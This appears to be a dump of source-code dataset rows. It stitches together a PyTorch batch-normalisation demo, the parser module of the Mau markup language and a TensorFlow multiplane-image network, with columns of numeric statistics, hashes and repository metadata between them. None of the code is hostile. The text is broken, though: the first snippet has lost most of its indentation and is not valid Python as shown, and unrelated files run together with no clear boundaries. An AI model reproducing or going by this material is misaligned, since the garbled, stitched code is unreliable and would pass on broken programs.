mean = X.mean(dim=(0, 2, 3), keepdim=True)
var = ((X - mean) ** 2).mean(dim=(0, 2, 3), keepdim=True)
# In training mode, the current mean and variance are used for the
# standardization
X_hat = (X - mean) / torch.sqrt(var + eps)
# Update the mean and variance using moving average
moving_mean = momentum * moving_mean + (1.0 - momentum) * mean
moving_var = momentum * moving_var + (1.0 - momentum) * var
Y = gamma * X_hat + beta # Scale and shift
return Y, moving_mean.data, moving_var.data
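# In short (summary added for reference): batch norm standardizes with
#   X_hat = (X - mean) / sqrt(var + eps),  Y = gamma * X_hat + beta,
# using batch statistics in training and the moving averages at prediction time.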
class BatchNorm(nn.Module):
# `num_features`: the number of outputs for a fully-connected layer
# or the number of output channels for a convolutional layer. `num_dims`:
# 2 for a fully-connected layer and 4 for a convolutional layer
def __init__(self, num_features, num_dims):
super().__init__()
if num_dims == 2:
shape = (1, num_features)
else:
shape = (1, num_features, 1, 1)
# The scale parameter and the shift parameter (model parameters) are
# initialized to 1 and 0, respectively
self.gamma = nn.Parameter(torch.ones(shape))
self.beta = nn.Parameter(torch.zeros(shape))
# The variables that are not model parameters are initialized to 0 and 1
self.moving_mean = torch.zeros(shape)
self.moving_var = torch.ones(shape)
def forward(self, X):
# If `X` is not on the main memory, copy `moving_mean` and
# `moving_var` to the device where `X` is located
if self.moving_mean.device != X.device:
self.moving_mean = self.moving_mean.to(X.device)
self.moving_var = self.moving_var.to(X.device)
# Save the updated `moving_mean` and `moving_var`
Y, self.moving_mean, self.moving_var = batch_norm(
X, self.gamma, self.beta, self.moving_mean,
self.moving_var, eps=1e-5, momentum=0.9)
return Y
if __name__=='__main__':
model = convmodel()
for m in model.parameters():
m.data.fill_(0.1)
# criterion = nn.CrossEntropyLoss()
criterion = nn.MSELoss()
optimizer = torch.optim.SGD(model.parameters(), lr=1.0)
model.train()
    # Simulate a batch of 8 input samples, each of size 10x10,
    # with all values initialized to 1 so the output is deterministic and easy to inspect
images = torch.ones(8, 3, 10, 10)
targets = torch.ones(8, dtype=torch.float)
output = model(images)
print(output.shape)
    # torch.Size([8, 1])
loss = criterion(output.view(-1,), targets)
print(model.conv1.weight.grad)
# None
loss.backward()
print(model.conv1.weight.grad[0][0][0])
# tensor([-0.0782, -0.0842, -0.0782])
    # One backward pass computes the gradients of the network parameters;
    # for brevity we only inspect a small slice of the result
print(model.conv1.weight[0][0][0])
# tensor([0.1000, 0.1000, 0.1000], grad_fn=<SelectBackward>)
    # Recall that all network parameters were initialized to 0.1
optimizer.step()
print(model.conv1.weight[0][0][0])
# tensor([0.1782, 0.1842, 0.1782], grad_fn=<SelectBackward>)
    # Recall that we set the learning rate to 1, so the updated
    # weights are exactly (original weights - gradients)!
optimizer.zero_grad()
print(model.conv1.weight.grad[0][0][0])
# tensor([0., 0., 0.])
    # Remember to zero the gradients after each weight update,
    # otherwise the next backward pass accumulates onto the previous result.
    # Of course, zero_grad() can also be moved earlier, as long as the
    # gradients are cleared before they are computed.
print('>>>test for bn<<<')
bn = nn.BatchNorm2d(2)
aa = torch.randn(2,2,1,1)
bb = bn(aa)
print('aa=', aa)
print('bb=', bb)
cc = BatchNorm(2, 4)(aa)
print('cc=', cc)
shape = (1, 2, 1, 1)
mean = aa.mean(dim=(0,2,3), keepdim=True)
dd = (aa - mean) / torch.sqrt(((aa-mean)**2).mean(dim=(0,2,3), keepdim=True))
print('dd=', dd)
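    # --- Illustrative check (not part of the original file) ---
    # In training mode the custom BatchNorm above should agree with
    # nn.BatchNorm2d (same eps=1e-5, gamma=1, beta=0 at init), so:
    print(torch.allclose(bb, cc, atol=1e-5))  # expected: True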
| 35.075342
| 81
| 0.610037
| 742
| 5,121
| 4.115903
| 0.283019
| 0.042567
| 0.015717
| 0.034381
| 0.227898
| 0.156189
| 0.12017
| 0.084479
| 0.060249
| 0.022921
| 0
| 0.044626
| 0.260496
| 5,121
| 146
| 82
| 35.075342
| 0.761817
| 0.32767
| 0
| 0.156627
| 0
| 0
| 0.010879
| 0
| 0
| 0
| 0
| 0
| 0.012048
| 1
| 0.060241
| false
| 0
| 0.060241
| 0
| 0.180723
| 0.13253
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
888a79727132fd019b0db67bf3741b80a00a7a59
| 29,630
|
py
|
Python
|
src/mau/parsers/main_parser.py
|
Project-Mau/mau
|
193d16633c1573227debf4517ebcaf07add24979
|
[
"MIT"
] | 28
|
2021-02-22T18:46:52.000Z
|
2022-02-21T15:14:05.000Z
|
src/mau/parsers/main_parser.py
|
Project-Mau/mau
|
193d16633c1573227debf4517ebcaf07add24979
|
[
"MIT"
] | 5
|
2021-02-23T09:56:13.000Z
|
2022-03-13T09:47:42.000Z
|
src/mau/parsers/main_parser.py
|
Project-Mau/mau
|
193d16633c1573227debf4517ebcaf07add24979
|
[
"MIT"
] | 2
|
2021-02-23T09:11:45.000Z
|
2021-03-13T11:08:21.000Z
|
import re
import copy
from mau.lexers.base_lexer import TokenTypes, Token
from mau.lexers.main_lexer import MainLexer
from mau.parsers.base_parser import (
BaseParser,
TokenError,
ConfigurationError,
parser,
)
from mau.parsers.text_parser import TextParser
from mau.parsers.arguments_parser import ArgumentsParser
from mau.parsers.preprocess_variables_parser import PreprocessVariablesParser
from mau.parsers.nodes import (
HorizontalRuleNode,
TextNode,
BlockNode,
ContentNode,
ContentImageNode,
CommandNode,
HeaderNode,
ListNode,
ListItemNode,
ParagraphNode,
TocNode,
TocEntryNode,
FootnotesNode,
)
class EngineError(ValueError):
""" Used to signal that the engine selected for a code block is not known """
def header_anchor(text, level):
"""
Return a sanitised anchor for a header.
"""
# Everything lowercase
sanitised_text = text.lower()
# Get only letters, numbers, dashes, spaces, and dots
sanitised_text = "".join(re.findall("[a-z0-9-\\. ]+", sanitised_text))
# Remove multiple spaces
sanitised_text = "-".join(sanitised_text.split())
return sanitised_text
# The MainParser is in charge of parsing
# the whole input, calling other parsers
# to manage single paragraphs or other
# things like variables.
class MainParser(BaseParser):
def __init__(self, variables=None):
super().__init__()
self.lexer = MainLexer()
# This is used as a storage for attributes.
# Block attributes are defined before the block
# so when we parse them we store them here and
# then use them when dealing with the block itself.
self.argsparser = ArgumentsParser()
# Copy the variables and make sure the "mau" namespace exists
self.variables = copy.deepcopy(variables) if variables else {}
if "mau" not in self.variables:
self.variables["mau"] = {}
self.headers = []
self.footnote_defs = []
self.blocks = {}
self.toc = None
# When we define a block we establish an alias
# {alias:actual_block_name}
self.block_aliases = {}
# Each block we define can have default values
# {actual_block_name:kwargs}
self.block_defaults = {}
# Each block we define can have names for unnamed arguments
        # {actual_block_name:[names]}
self.block_names = {}
# Backward compatibility with Mau 1.x
# Mau 1.x used [source] to format source, while Mau 2.x
# uses [myblock, engine=source], so this establishes
# a default block definition so that
# [source] = [source, engine=source]
# In Mau 2.x this block uses the template "block-source"
# so any template called "source" (e.g. "source.html")
# must be renamed.
# This definition can be overridden by custom block definitions
self.block_aliases["source"] = "source"
self.block_defaults["source"] = {"engine": "source", "language": "text"}
self.block_names["source"] = ["language"]
self.block_aliases["admonition"] = "admonition"
self.block_names["admonition"] = ["class", "icon", "label"]
self.block_aliases["quote"] = "quote"
self.block_defaults["quote"] = {"attribution": None}
self.block_names["quote"] = ["attribution"]
# Iterate through block definitions passed as variables
for alias, block_definition in (
self.variables["mau"].get("block_definitions", {}).items()
):
try:
blocktype = block_definition["blocktype"]
self.block_aliases[alias] = blocktype
except KeyError:
raise ConfigurationError(
f"Block definition '{alias}' is missing key 'blocktype'"
)
try:
self.block_defaults[blocktype] = block_definition["kwargs"]
except KeyError:
raise ConfigurationError(
f"Block definition '{alias}' is missing key 'kwargs'"
)
# This is a buffer for a block title
self._title = None
# This is the function used to create the header
# anchors. It can be specified through
# mau.header_anchor_function to override
# the default one.
self.header_anchor = self.variables["mau"].get(
"header_anchor_function", header_anchor
)
self.v1_backward_compatibility = self.variables["mau"].get(
"v1_backward_compatibility", False
)
def _pop_title(self):
        # This returns the title and resets the
        # cached one, so no other block will
        # use it.
title = self._title
self._title = None
return title
def _push_title(self, title):
# When we parse a title we can store it here
# so that it is available to the next block
# that will use it.
self._title = title
def _collect_lines(self, stop_tokens):
# This collects several lines of text in a list
# until it gets to a line that begins with one
# of the tokens listed in stop_tokens.
        # It is useful for blocks or other elements that
# are clearly surrounded by delimiters.
lines = []
while self.peek_token() not in stop_tokens:
lines.append(self.collect_join([Token(TokenTypes.EOL)]))
self.get_token(TokenTypes.EOL)
return lines
def _collect_text_content(self):
# Collects all adjacent text tokens
# into a single string
if not self.peek_token_is(TokenTypes.TEXT):
return None
values = []
# Get all tokens
while self.peek_token_is(TokenTypes.TEXT):
values.append(self.get_token().value)
self.get_token(TokenTypes.EOL)
return " ".join(values)
def _parse_text_content(self, text):
# Parse a text using the TextParser.
# Replace variables
p = PreprocessVariablesParser(self.variables).analyse(
text,
)
text = p.nodes[0].value
# Parse the text
p = TextParser(
footnotes_start_with=len(self.footnote_defs) + 1,
v1_backward_compatibility=self.v1_backward_compatibility,
).analyse(text)
# Text should return a single sentence node
result = p.nodes[0]
# Store the footnotes
self.footnote_defs.extend(p.footnote_defs)
return result
@parser
def _parse_eol(self):
# This simply parses the end of line.
self.get_token(TokenTypes.EOL)
@parser
def _parse_horizontal_rule(self):
# The horizontal rule ---
self.get_token(TokenTypes.LITERAL, "---")
self.get_token(TokenTypes.EOL)
self._save(HorizontalRuleNode())
@parser
def _parse_single_line_comment(self):
# // A comment on a single line
self.get_token(TokenTypes.TEXT, check=lambda x: x.startswith("//"))
self.get_token(TokenTypes.EOL)
@parser
def _parse_multi_line_comment(self):
# ////
# A comment
# on multiple lines
# ////
self.get_token(TokenTypes.LITERAL, "////")
self._collect_lines([Token(TokenTypes.LITERAL, "////"), Token(TokenTypes.EOF)])
self.force_token(TokenTypes.LITERAL, "////")
@parser
def _parse_variable_definition(self):
# This parses a variable definition
#
# Simple variables are defined as :name:value
        # True boolean flags as just :name:
        # and False boolean flags as :!name:
#
# Variable names can use a namespace with
# :namespace.name:value
# Get the mandatory variable name
self.get_token(TokenTypes.LITERAL, ":")
variable_name = self.get_token(TokenTypes.TEXT).value
self.get_token(TokenTypes.LITERAL, ":")
# Assume the variable is a flag
variable_value = True
# If the name starts with ! it's a false flag
if variable_name.startswith("!"):
variable_value = False
variable_name = variable_name[1:]
# Get the optional value
value = self.collect_join([Token(TokenTypes.EOL)])
# The value is assigned only if the variable
# is not a negative flag. In that case it is ignored
if variable_value and len(value) > 0:
variable_value = value
# If the variable name contains a dot we
# want to use a namespace
if "." not in variable_name:
self.variables[variable_name] = variable_value
else:
            # Let's ignore all other dots
namespace, variable_name = variable_name.split(".", maxsplit=1)
# This defines the namespace if it's not already there
try:
self.variables[namespace][variable_name] = variable_value
except KeyError:
self.variables[namespace] = {variable_name: variable_value}
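        # Worked example (illustrative, not in the original file):
        # ':mau.theme:dark' yields variables['mau']['theme'] == 'dark',
        # while ':!draft:' yields variables['draft'] == False.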
@parser
def _parse_command(self):
# Parse a command in the form ::command:
self.get_token(TokenTypes.LITERAL, "::")
name = self.get_token(TokenTypes.TEXT).value
self.get_token(TokenTypes.LITERAL, ":")
args = []
kwargs = {}
# Commands can have arguments
with self:
arguments = self.get_token(TokenTypes.TEXT).value
self.argsparser.analyse(arguments)
# Consume the attributes
args, kwargs = self.argsparser.get_arguments_and_reset()
if name == "defblock":
# Block definitions must have at least 2 arguments,
# the alias and the block type.
if len(args) < 2:
self.error(
"Block definitions require at least two unnamed arguments: ALIAS and BLOCKTYPE"
)
block_alias = args.pop(0)
block_type = args.pop(0)
self.block_aliases[block_alias] = block_type
self.block_defaults[block_type] = kwargs
self.block_names[block_type] = args
return None
self._save(CommandNode(name=name, args=args, kwargs=kwargs))
@parser
def _parse_title(self):
# Parse a title in the form
#
# . This is a title
# or
# .This is a title
# Parse the mandatory dot
self.get_token(TokenTypes.LITERAL, ".")
# Parse the optional white spaces
with self:
self.get_token(TokenTypes.WHITESPACE)
# Get the text of the title
text = self.get_token(TokenTypes.TEXT).value
self.get_token(TokenTypes.EOL)
# Titles can contain Mau code
p = TextParser(
footnotes_start_with=len(self.footnote_defs) + 1,
v1_backward_compatibility=self.v1_backward_compatibility,
).analyse(text)
title = p.nodes[0]
self._push_title(title)
@parser
def _parse_attributes(self):
# Parse block attributes in the form
# [unnamed1, unnamed2, ..., named1=value1, name2=value2, ...]
self.get_token(TokenTypes.LITERAL, "[")
attributes = self.get_token(TokenTypes.TEXT).value
self.get_token(TokenTypes.LITERAL, "]")
# Attributes can use variables
p = PreprocessVariablesParser(self.variables).analyse(
attributes,
)
attributes = p.nodes[0].value
# Parse the arguments
self.argsparser.analyse(attributes)
@parser
def _parse_header(self):
# Parse a header in the form
#
# = Header
#
# The number of equal signs is arbitrary
# and represents the level of the header.
# Headers are automatically assigned an anchor
# created using the provided function self.header_anchor
#
# Headers in the form
# =! Header
# are rendered but not included in the TOC
# Get all the equal signs
header = self.get_token(
TokenTypes.LITERAL, check=lambda x: x.startswith("=")
).value
# Get the mandatory white spaces
self.get_token(TokenTypes.WHITESPACE)
# Check if the header has to be in the TOC
in_toc = True
if header.endswith("!"):
header = header[:-1]
in_toc = False
# Get the text of the header and calculate the level
text = self.get_token(TokenTypes.TEXT).value
level = len(header)
# Generate the anchor and append it to the TOC
anchor = self.header_anchor(text, level)
# Consume the attributes
args, kwargs = self.argsparser.get_arguments_and_reset()
# Generate the header node
header_node = HeaderNode(value=text, level=level, anchor=anchor, kwargs=kwargs)
if in_toc:
self.headers.append(header_node)
self._save(header_node)
@parser
def _parse_block(self):
# Parse a block in the form
#
# [block_type]
# ----
# Content
# ----
# Optional secondary content
#
# Blocks are delimited by 4 consecutive identical characters.
# Get the delimiter and check the length
delimiter = self.get_token(TokenTypes.TEXT).value
if len(delimiter) != 4 or len(set(delimiter)) != 1:
raise TokenError
self.get_token(TokenTypes.EOL)
# Collect everything until the next delimiter
content = self._collect_lines(
[Token(TokenTypes.TEXT, delimiter), Token(TokenTypes.EOF)]
)
self.force_token(TokenTypes.TEXT, delimiter)
self.get_token(TokenTypes.EOL)
# Get the optional secondary content
secondary_content = self._collect_lines(
[Token(TokenTypes.EOL), Token(TokenTypes.EOF)]
)
# Consume the title
title = self._pop_title()
# The first unnamed argument is the block type
blocktype = self.argsparser.pop()
# If there is a block alias for blocktype replace it
# otherwise use the blocktype we already have
blocktype = self.block_aliases.get(blocktype, blocktype)
# Assign names
self.argsparser.set_names_and_defaults(
self.block_names.get(blocktype, []), self.block_defaults.get(blocktype, {})
)
# Consume the attributes
args, kwargs = self.argsparser.get_arguments_and_reset()
# Extract classes and convert them into a list
classes = [i for i in kwargs.pop("classes", "").split(",") if len(i) > 0]
# Extract condition if present and process it
condition = kwargs.pop("condition", "")
# Run this only if there is a condition on this block
if len(condition) > 0:
try:
# The condition should be either test:variable:value or test:variable:
test, variable, value = condition.split(":")
except ValueError:
self.error(
                f'Condition {condition} is not in the form "test:variable:value" or "test:variable:"'
)
# If there is no value use True
if len(value) == 0:
value = True
# Check if the variable matches the value and apply the requested test
match = self.variables.get(variable) == value
            result = test == "if"
# If the condition is not satisfied return
if match is not result:
return
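        # Worked example (illustrative, not in the original file):
        # with condition="if:draft:yes" and variables={"draft": "yes"},
        # match == result == True, so the block is rendered; any test
        # value other than "if" inverts the check.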
# Extract the preprocessor
preprocessor = kwargs.pop("preprocessor", "none")
# Extract the engine
engine = kwargs.pop("engine", "default")
# Create the node parameters according to the engine
if engine in ["raw", "mau"]:
# Engine "raw" doesn't process the content,
# so we just pass it untouched in the form of
# a TextNode per line. The same is true for "mau"
            # as the visitor will have to fire up a new parser
# to process the content.
content = [TextNode(line) for line in content]
secondary_content = [TextNode(line) for line in secondary_content]
elif engine == "source":
# Engine "source" extracts the content (source code),
# the callouts, and the highlights.
# The default language is "text".
content, callouts, highlights = self._parse_source_engine(
content, secondary_content, kwargs
)
secondary_content = []
kwargs["callouts"] = callouts
kwargs["highlights"] = highlights
kwargs["language"] = kwargs.get("language", "text")
elif engine == "default":
# This is the default engine and it parses
# both content and secondary content using a new parser
# but then merges headers and footnotes into the
# current one.
# Parse the primary and secondary content and record footnotes
pc = MainParser(variables=self.variables).analyse("\n".join(content))
ps = MainParser(variables=self.variables).analyse(
"\n".join(secondary_content)
)
content = pc.nodes
secondary_content = ps.nodes
self.footnote_defs.extend(pc.footnote_defs)
self.headers.extend(pc.headers)
else:
raise EngineError(f"Engine {engine} is not available")
self._save(
BlockNode(
blocktype=blocktype,
content=content,
secondary_content=secondary_content,
args=args,
classes=classes,
engine=engine,
preprocessor=preprocessor,
kwargs=kwargs,
title=title,
)
)
def _parse_source_engine(self, content, secondary_content, kwargs):
# Parse a source block in the form
#
# [source, language, attributes...]
# ----
# content
# ----
#
# Source blocks support the following attributes
#
# callouts=":" The separator used by callouts
# highlight="@" The special character to turn on highlight
#
# [source, language, attributes...]
# ----
# content:1:
# ----
#
# [source, language, attributes...]
# ----
# content:@:
# ----
#
# Callout descriptions can be added to the block
# as secondary content with the syntax
#
# [source, language, attributes...]
# ----
# content:name:
# ----
# <name>: <description>
#
# Since Mau uses Pygments, the attribute language
        # is one of the languages supported by that tool.
# Get the delimiter for callouts (":" by default)
delimiter = kwargs.pop("callouts", ":")
# A dictionary that contains callout markers in
# the form {linenum:name}
callout_markers = {}
# Get the marker for highlighted lines ("@" by default)
highlight_marker = kwargs.pop("highlight", "@")
# A list of highlighted lines
highlighted_lines = []
# This is a list of all lines that might contain
# a callout. They will be further processed
# later to be sure.
lines_with_callouts = [
(linenum, line)
for linenum, line in enumerate(content)
if line.endswith(delimiter)
]
# Each line in the previous list is processed
# and stored if it contains a callout
for linenum, line in lines_with_callouts:
# Remove the final delimiter
line = line[:-1]
splits = line.split(delimiter)
if len(splits) < 2:
# It's a trap! There are no separators left
continue
# Get the callout and the line
callout_name = splits[-1]
line = delimiter.join(splits[:-1])
content[linenum] = line
# Check if we want to just highlight the line
if callout_name == highlight_marker:
highlighted_lines.append(linenum)
else:
callout_markers[linenum] = callout_name
# A dictionary that contains the text for each
# marker in the form {name:text}
callout_contents = {}
# If there was secondary content it should be formatted
# with callout names followed by colon and the
# callout text.
for line in secondary_content:
if ":" not in line:
self.error(
f"Callout description should be written as 'name: text'. Missing ':' in '{line}'"
)
name, text = line.split(":")
if name not in callout_markers.values():
self.error(f"Callout {name} has not been created in the source code")
text = text.strip()
callout_contents[name] = text
# Put markers and contents together
callouts = {"markers": callout_markers, "contents": callout_contents}
# Source blocks must preserve the content literally
textlines = [TextNode(line) for line in content]
return textlines, callouts, highlighted_lines
# self._save(
# SourceNode(
# language,
# callouts=callouts,
# highlights=highlighted_lines,
# delimiter=delimiter,
# code=textlines,
# title=title,
# kwargs=kwargs,
# )
# )
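        # Worked example (illustrative, not in the original file): given
        # the content line 'print(x):1:' with the default ':' delimiter,
        # the loop above strips the trailing ':', splits off the callout
        # name '1', rewrites the line to 'print(x)', and records
        # {0: '1'} in callout_markers.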
@parser
def _parse_content(self):
# Parse attached content in the form
#
# [attributes]
# << content_type:uri
# Get the mandatory "<<" and white spaces
self.get_token(TokenTypes.LITERAL, check=lambda x: x.startswith("<<"))
self.get_token(TokenTypes.WHITESPACE)
# Get the content type and the content URI
content_type_and_uri = self.get_token(TokenTypes.TEXT).value
content_type, uri = content_type_and_uri.split(":", maxsplit=1)
title = self._pop_title()
if content_type == "image":
return self._parse_content_image(uri, title)
return self._parse_standard_content(content_type, uri, title)
def _parse_content_image(self, uri, title):
# Parse a content image in the form
#
# [alt_text, classes]
# << image:uri
#
        # alt_text is the alternate text to use if the image is not reachable
# and classes is a comma-separated list of classes
# Assign names and consume the attributes
self.argsparser.set_names_and_defaults(
["alt_text", "classes"], {"alt_text": None, "classes": None}
)
args, kwargs = self.argsparser.get_arguments_and_reset()
alt_text = kwargs.pop("alt_text")
classes = kwargs.pop("classes")
if classes:
classes = classes.split(",")
self._save(
ContentImageNode(
uri=uri,
alt_text=alt_text,
classes=classes,
title=title,
kwargs=kwargs,
)
)
def _parse_standard_content(self, content_type, uri, title):
# This is the fallback for an unknown content type
# Consume the attributes
args, kwargs = self.argsparser.get_arguments_and_reset()
self._save(
ContentNode(
uri=uri,
title=title,
args=args,
kwargs=kwargs,
)
)
@parser
def _parse_list(self):
# Parse a list.
        # Lists can be unordered (using asterisks)
        #
        # * One item
        # * Another item
        #
        # or ordered/numbered (using hashes)
        #
        # # Item 1
        # # Item 2
#
        # The number of marker characters sets
        # the depth of each item
#
# # Item 1
# ## Sub-Item 1.1
#
# Spaces before and after the header are ignored.
# So the previous list can be also written
#
# # Item 1
# ## Sub-Item 1.1
#
# Ordered and unordered lists can be mixed.
#
# * One item
# ## Sub Item 1
# ## Sub Item 2
#
# Ignore initial white spaces
with self:
self.get_token(TokenTypes.WHITESPACE)
# Get the header and decide if it's a numbered or unnumbered list
header = self.peek_token(TokenTypes.LITERAL, check=lambda x: x[0] in "*#")
        numbered = header.value[0] == "#"
# Parse all the following items
nodes = self._parse_list_nodes()
self._save(ListNode(numbered, nodes, main_node=True))
def _parse_list_nodes(self):
# This parses all items of a list
# Ignore initial white spaces
with self:
self.get_token(TokenTypes.WHITESPACE)
# Parse the header and ignore the following white spaces
header = self.get_token(TokenTypes.LITERAL, check=lambda x: x[0] in "*#").value
self.get_token(TokenTypes.WHITESPACE)
# Collect and parse the text of the item
text = self._collect_text_content()
content = self._parse_text_content(text)
# Compute the level of the item
level = len(header)
nodes = []
nodes.append(ListItemNode(level, content))
        while self.peek_token() not in [Token(TokenTypes.EOF), Token(TokenTypes.EOL)]:
# This is the SentenceNode inside the last node added to the list
# which is used to append potential nested nodes
last_node_sentence = nodes[-1].content
# Ignore the initial white spaces
with self:
self.get_token(TokenTypes.WHITESPACE)
if len(self.peek_token().value) == level:
# The new item is on the same level
# Get the header
header = self.get_token().value
# Ignore white spaces
self.get_token(TokenTypes.WHITESPACE)
# Collect and parse the text of the item
text = self._collect_text_content()
content = self._parse_text_content(text)
nodes.append(ListItemNode(len(header), content))
elif len(self.peek_token().value) > level:
# The new item is on a deeper level
# Treat the new line as a new list
                numbered = self.peek_token().value[0] == "#"
subnodes = self._parse_list_nodes()
last_node_sentence.content.append(ListNode(numbered, subnodes))
else:
break
return nodes
@parser
def _parse_paragraph(self):
# This parses a paragraph.
# Paragraphs can be written on multiple lines and
# end with an empty line.
# Get all the lines, join them and parse them
lines = self._collect_lines([Token(TokenTypes.EOL), Token(TokenTypes.EOF)])
text = " ".join(lines)
sentence = self._parse_text_content(text)
# Consume the attributes
args, kwargs = self.argsparser.get_arguments_and_reset()
self._save(ParagraphNode(sentence, args=args, kwargs=kwargs))
def _parse_functions(self):
# All the functions that this parser provides.
return [
self._parse_eol,
self._parse_horizontal_rule,
self._parse_single_line_comment,
self._parse_multi_line_comment,
self._parse_variable_definition,
self._parse_command,
self._parse_title,
self._parse_attributes,
self._parse_header,
self._parse_block,
self._parse_content,
self._parse_list,
self._parse_paragraph,
]
def _create_toc(self):
# Create the TOC from the list of headers.
nodes = []
latest_by_level = {}
for header_node in self.headers:
# This is the current node
node = TocEntryNode(header_node)
level = header_node.level
# This collects the latest node added with a given level
latest_by_level[level] = node
try:
# Simplest case, add it to the latest one
# with a level just 1 step lower
latest_by_level[level - 1].children.append(node)
except KeyError:
# Find all the latest ones added with a level lower than this
latest = [latest_by_level.get(i, None) for i in range(1, level)]
# Get the children list of each one, plus nodes for the root
children = [nodes] + [i.children for i in latest if i is not None]
# Get the nearest one and append to that
children[-1].append(node)
return TocNode(entries=nodes)
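        # Worked example (illustrative, not in the original file):
        # headers at levels [1, 2, 2, 1] yield two root entries, with the
        # two level-2 nodes attached as children of the first level-1 entry.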
def parse(self):
super().parse()
self.toc = self._create_toc()
self.footnotes = FootnotesNode(entries=self.footnote_defs)
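# --- Illustrative sketch (not part of the original file) ---
# A minimal driver, assuming the mau package above is importable and that
# analyse() runs lexing and parsing in one call, as it does for the
# TextParser instances used above.
if __name__ == "__main__":
    p = MainParser().analyse("= Title\n\nA paragraph with some text.\n")
    print(p.nodes)  # e.g. [HeaderNode(...), ParagraphNode(...)]
    print(p.toc)    # TocNode built from the collected headers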
| 32.136659
| 104
| 0.583463
| 3,356
| 29,630
| 5.029201
| 0.145113
| 0.046214
| 0.027728
| 0.048228
| 0.232255
| 0.206067
| 0.145396
| 0.117075
| 0.111151
| 0.09859
| 0
| 0.003189
| 0.333277
| 29,630
| 921
| 105
| 32.171553
| 0.851177
| 0.29811
| 0
| 0.238532
| 0
| 0.002294
| 0.045046
| 0.003322
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061927
| false
| 0
| 0.020642
| 0.002294
| 0.119266
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
888b41cc12274148e790e361bed90e406da76010
| 3,344
|
py
|
Python
|
stereomag/nets.py
|
MandyMY/stereo-magnification
|
c18fa484484597dfa653f317459a503d9bf8d933
|
[
"Apache-2.0"
] | null | null | null |
stereomag/nets.py
|
MandyMY/stereo-magnification
|
c18fa484484597dfa653f317459a503d9bf8d933
|
[
"Apache-2.0"
] | null | null | null |
stereomag/nets.py
|
MandyMY/stereo-magnification
|
c18fa484484597dfa653f317459a503d9bf8d933
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Network definitions for multiplane image (MPI) prediction networks.
"""
from __future__ import division
import numpy as np
#import tensorflow as tf
import tensorflow.compat.v1 as tf
#from tensorflow.contrib import slim
import tf_slim as slim
def mpi_net(inputs, num_outputs, ngf=64, vscope='net', reuse_weights=False):
"""Network definition for multiplane image (MPI) inference.
Args:
inputs: stack of input images [batch, height, width, input_channels]
num_outputs: number of output channels
ngf: number of features for the first conv layer
vscope: variable scope
reuse_weights: whether to reuse weights (for weight sharing)
Returns:
pred: network output at the same spatial resolution as the inputs.
"""
with tf.variable_scope(vscope, reuse=reuse_weights):
with slim.arg_scope(
[slim.conv2d, slim.conv2d_transpose], normalizer_fn=slim.layer_norm):
cnv1_1 = slim.conv2d(inputs, ngf, [3, 3], scope='conv1_1', stride=1)
cnv1_2 = slim.conv2d(cnv1_1, ngf * 2, [3, 3], scope='conv1_2', stride=2)
cnv2_1 = slim.conv2d(cnv1_2, ngf * 2, [3, 3], scope='conv2_1', stride=1)
cnv2_2 = slim.conv2d(cnv2_1, ngf * 4, [3, 3], scope='conv2_2', stride=2)
cnv3_1 = slim.conv2d(cnv2_2, ngf * 4, [3, 3], scope='conv3_1', stride=1)
cnv3_2 = slim.conv2d(cnv3_1, ngf * 4, [3, 3], scope='conv3_2', stride=1)
cnv3_3 = slim.conv2d(cnv3_2, ngf * 8, [3, 3], scope='conv3_3', stride=2)
cnv4_1 = slim.conv2d(
cnv3_3, ngf * 8, [3, 3], scope='conv4_1', stride=1, rate=2)
cnv4_2 = slim.conv2d(
cnv4_1, ngf * 8, [3, 3], scope='conv4_2', stride=1, rate=2)
cnv4_3 = slim.conv2d(
cnv4_2, ngf * 8, [3, 3], scope='conv4_3', stride=1, rate=2)
# Adding skips
skip = tf.concat([cnv4_3, cnv3_3], axis=3)
cnv6_1 = slim.conv2d_transpose(
skip, ngf * 4, [4, 4], scope='conv6_1', stride=2)
cnv6_2 = slim.conv2d(cnv6_1, ngf * 4, [3, 3], scope='conv6_2', stride=1)
cnv6_3 = slim.conv2d(cnv6_2, ngf * 4, [3, 3], scope='conv6_3', stride=1)
skip = tf.concat([cnv6_3, cnv2_2], axis=3)
cnv7_1 = slim.conv2d_transpose(
skip, ngf * 2, [4, 4], scope='conv7_1', stride=2)
cnv7_2 = slim.conv2d(cnv7_1, ngf * 2, [3, 3], scope='conv7_2', stride=1)
skip = tf.concat([cnv7_2, cnv1_2], axis=3)
cnv8_1 = slim.conv2d_transpose(
skip, ngf, [4, 4], scope='conv8_1', stride=2)
cnv8_2 = slim.conv2d(cnv8_1, ngf, [3, 3], scope='conv8_2', stride=1)
feat = cnv8_2
pred = slim.conv2d(
feat,
num_outputs, [1, 1],
stride=1,
activation_fn=tf.nn.tanh,
normalizer_fn=None,
scope='color_pred')
return pred
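# --- Illustrative sketch (not part of the original file) ---
# A graph-mode shape check, assuming the tf.compat.v1 import above; the
# input layout and num_outputs value are ours for illustration. Height
# and width must be divisible by 8 (three stride-2 convolutions).
if __name__ == '__main__':
  tf.disable_v2_behavior()
  inputs = tf.placeholder(tf.float32, [1, 256, 256, 6])  # e.g. two stacked RGB frames
  pred = mpi_net(inputs, num_outputs=34)
  print(pred.shape)  # (1, 256, 256, 34): same spatial resolution as the input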
| 39.809524
| 78
| 0.650718
| 533
| 3,344
| 3.93621
| 0.300188
| 0.095329
| 0.046711
| 0.014299
| 0.157769
| 0.119161
| 0.027645
| 0.027645
| 0
| 0
| 0
| 0.081516
| 0.2186
| 3,344
